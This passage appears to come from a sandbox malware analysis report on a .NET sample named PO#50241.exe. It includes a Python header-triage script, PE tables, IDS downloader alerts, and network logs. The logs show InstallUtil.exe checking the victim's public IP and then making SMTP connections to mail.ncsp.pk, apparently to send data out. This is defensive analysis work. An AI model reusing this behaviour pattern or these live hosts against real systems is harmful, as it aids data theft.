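    """Minimal decoder for the two encodings present at this entry point.

    FF 25 disp32 -> jmp dword ptr [disp32]; 00 00 -> add byte ptr [eax], al.
    Anything else is emitted as a raw byte so it is obvious where real code would begin.
    """
    out, i = [], 0
    while i < len(code):
        if code[i:i + 2] == b"\xff\x25" and i + 6 <= len(code):
            disp = struct.unpack_from("<I", code, i + 2)[0]
            out.append(f"jmp dword ptr [{disp:08X}h]")
            i += 6
        elif code[i:i + 2] == b"\x00\x00":
            out.append("add byte ptr [eax], al")
            i += 2
        else:
            out.append(f"db {code[i]:02X}h")
            i += 1
    return out


def triage_header() -> dict:
    flags = dll_characteristics_from_names(REPORTED_DLL_CHARACTERISTICS)
    notes = []
    if flags & 0x0020:  # meaningful only for 64-bit ASLR, but routinely set by the .NET toolchain
        notes.append("HIGH_ENTROPY_VA on a 32-bit image is inert; typical .NET linker output")
    return {"compiled_utc": timestamp_to_utc(TIME_DATE_STAMP),
            "entrypoint_rva": va_to_rva(ENTRYPOINT_VA),
            "dll_characteristics": flags,
            "entry_stub": decode_entry_stub(ENTRY_STUB),
            "listing": disassemble_stub_region(ENTRY_REGION),
            "notes": notes}


if __name__ == "__main__":
    for k, v in triage_header().items():
        print(f"{k}: {v:#x}" if isinstance(v, int) else f"{k}: {v}")
```

The value of doing this by hand once is knowing what to expect: a 32-bit managed image with DllCharacteristics 0x8560, a six-byte `jmp [IAT]` stub, and zero padding after it is the normal shape of a compiler-built .NET EXE; native code at the entry point, or a stub that does not target the IAT, would be the anomaly worth following.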
                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
add byte ptr [eax], al    ; repeated 85 times in this listing: 00 00 bytes, i.e. zero padding after the .NET entry stub, not code
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1ccd1c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1ce000 | 0x5a6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1d0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1cad74 | 0x1cae00 | e8d03b4ab71c806c7f6aa34349e2224a | False | 0.7396235911536366 | data | 7.513094425002416 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x1ce000 | 0x5a6 | 0x600 | 8d02a69460afe377c408333c54af6f4d | False | 0.4186197916666667 | data | 4.108165928395942 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1d0000 | 0xc | 0x200 | 440e854cada97c0cc6381c19ea5f0783 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x1ce0a0 | 0x31c | data | | | 0.4321608040201005
RT_MANIFEST | 0x1ce3bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
Comments |
CompanyName |
FileDescription | PO#50241
FileVersion | 1.0.0.0
InternalName | PO#50241.exe
LegalCopyright | Copyright 2016
LegalTrademarks |
OriginalFilename | PO#50241.exe
ProductName | PO#50241
ProductVersion | 1.0.0.0
Assembly Version | 1.0.0.0
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-11T04:11:36.972985+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49692 | 132.226.8.169 | 80 | TCP
2025-03-11T04:11:46.817416+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49692 | 132.226.8.169 | 80 | TCP
2025-03-11T04:11:51.708081+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49697 | 132.226.8.169 | 80 | TCP
2025-03-11T04:12:02.301801+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49697 | 132.226.8.169 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 11, 2025 04:11:34.128443956 CET | 49692 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:34.133358002 CET | 80 | 49692 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:34.133450985 CET | 49692 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:34.134108067 CET | 49692 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:34.139017105 CET | 80 | 49692 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:35.061326981 CET | 80 | 49692 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:35.065959930 CET | 49692 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:35.070769072 CET | 80 | 49692 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:36.918642044 CET | 80 | 49692 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:36.931723118 CET | 49694 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:36.931762934 CET | 443 | 49694 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:36.931858063 CET | 49694 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:36.941905022 CET | 49694 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:36.941920996 CET | 443 | 49694 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:36.972985029 CET | 49692 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:38.807157993 CET | 443 | 49694 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:38.807305098 CET | 49694 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:38.896663904 CET | 49694 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:38.896683931 CET | 443 | 49694 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:38.897082090 CET | 443 | 49694 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:38.942394972 CET | 49694 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:39.375214100 CET | 49694 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:39.416322947 CET | 443 | 49694 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:39.851627111 CET | 443 | 49694 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:39.851700068 CET | 443 | 49694 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:39.851763964 CET | 49694 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:39.859627962 CET | 49694 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:45.019588947 CET | 49692 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:45.024532080 CET | 80 | 49692 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:46.765120029 CET | 80 | 49692 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:46.817415953 CET | 49692 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:46.878305912 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:46.883214951 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:46.883299112 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:47.372541904 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:47.372797966 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:47.377716064 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:47.620040894 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:47.621753931 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:47.626653910 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:47.721255064 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:47.722536087 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:47.727514029 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:47.828789949 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:47.829027891 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:47.833947897 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:47.928509951 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:47.929924965 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:47.934825897 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.031462908 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.031651974 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:48.036578894 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.131032944 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.133378029 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:48.133470058 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:48.133518934 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:48.133558035 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:48.133629084 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:48.133646011 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:48.133694887 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:48.133725882 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:48.138326883 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.138370991 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.138387918 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.138416052 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.138510942 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.138525963 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.138660908 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.138674974 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.138689041 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.155946970 CET | 49697 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:48.160887957 CET | 80 | 49697 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:48.160979033 CET | 49697 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:48.161407948 CET | 49697 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:48.166294098 CET | 80 | 49697 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:48.244131088 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:11:48.286164045 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:11:50.292490959 CET | 80 | 49697 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:50.302694082 CET | 49697 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:50.307915926 CET | 80 | 49697 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:51.657275915 CET | 80 | 49697 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:11:51.659596920 CET | 49699 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:51.659666061 CET | 443 | 49699 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:51.659750938 CET | 49699 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:51.664133072 CET | 49699 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:51.664174080 CET | 443 | 49699 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:51.708081007 CET | 49697 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:53.463502884 CET | 443 | 49699 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:53.463587999 CET | 49699 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:53.465811014 CET | 49699 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:53.465832949 CET | 443 | 49699 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:53.466114998 CET | 443 | 49699 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:53.520535946 CET | 49699 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:53.592499018 CET | 49699 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:53.636334896 CET | 443 | 49699 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:54.112392902 CET | 443 | 49699 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:54.112481117 CET | 443 | 49699 | 104.21.80.1 | 192.168.2.6
Mar 11, 2025 04:11:54.112668991 CET | 49699 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:54.118887901 CET | 49699 | 443 | 192.168.2.6 | 104.21.80.1
Mar 11, 2025 04:11:59.688185930 CET | 49697 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:11:59.693490028 CET | 80 | 49697 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:12:02.258959055 CET | 80 | 49697 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:12:02.287945032 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:02.292924881 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:02.293019056 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:02.301800966 CET | 49697 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:12:02.785659075 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:02.815756083 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:02.824428082 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:02.916202068 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:02.930749893 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:02.936927080 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.032586098 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.032924891 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.038423061 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.142643929 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.146120071 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.151585102 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.249808073 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.250032902 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.259439945 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.351807117 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.354588985 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.359484911 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.454019070 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.454632998 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.454727888 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.454777002 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.454828978 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.454936028 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.454953909 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.454974890 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.454988956 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:03.459908009 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.460083008 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.460114002 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.460143089 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.460176945 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.460560083 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.460607052 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.565742016 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:12:03.614265919 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:12:36.786530972 CET | 49692 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:12:36.792625904 CET | 80 | 49692 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:12:36.792682886 CET | 49692 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:12:52.302093983 CET | 49697 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:12:52.307341099 CET | 80 | 49697 | 132.226.8.169 | 192.168.2.6
Mar 11, 2025 04:12:52.307569027 CET | 49697 | 80 | 192.168.2.6 | 132.226.8.169
Mar 11, 2025 04:13:26.802114010 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:13:26.807153940 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:13:27.103971958 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:13:27.104203939 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Mar 11, 2025 04:13:27.104213953 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:13:27.104278088 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250
Mar 11, 2025 04:13:27.109134912 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 11, 2025 04:11:34.112692118 CET | 52414 | 53 | 192.168.2.6 | 1.1.1.1
Mar 11, 2025 04:11:34.120985985 CET | 53 | 52414 | 1.1.1.1 | 192.168.2.6
Mar 11, 2025 04:11:36.920682907 CET | 62815 | 53 | 192.168.2.6 | 1.1.1.1
Mar 11, 2025 04:11:36.929596901 CET | 53 | 62815 | 1.1.1.1 | 192.168.2.6
Mar 11, 2025 04:11:46.781217098 CET | 58495 | 53 | 192.168.2.6 | 1.1.1.1
Mar 11, 2025 04:11:46.877480030 CET | 53 | 58495 | 1.1.1.1 | 192.168.2.6
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Mar 11, 2025 04:11:34.112692118 CET192.168.2.61.1.1.10x6549Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.920682907 CET192.168.2.61.1.1.10x35dfStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:46.781217098 CET192.168.2.61.1.1.10x898Standard query (0)mail.ncsp.pkA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:46.877480030 CET1.1.1.1192.168.2.60x898No error (0)mail.ncsp.pk209.182.213.250A (IP address)IN (0x0001)false
                                                                            • reallyfreegeoip.org
                                                                            • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49692 | 132.226.8.169 | 80 | 6996 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2025 04:11:34.134108067 CET | 151 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
Mar 11, 2025 04:11:35.061326981 CET | 273 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:34 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 11, 2025 04:11:35.065959930 CET | 127 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
Mar 11, 2025 04:11:36.918642044 CET | 273 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:36 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 11, 2025 04:11:45.019588947 CET | 127 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
Mar 11, 2025 04:11:46.765120029 CET | 273 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:46 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49697 | 132.226.8.169 | 80 | 7368 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2025 04:11:48.161407948 CET | 151 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
Mar 11, 2025 04:11:50.292490959 CET | 273 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:50 GMT
                                                                            Content-Type: text/html
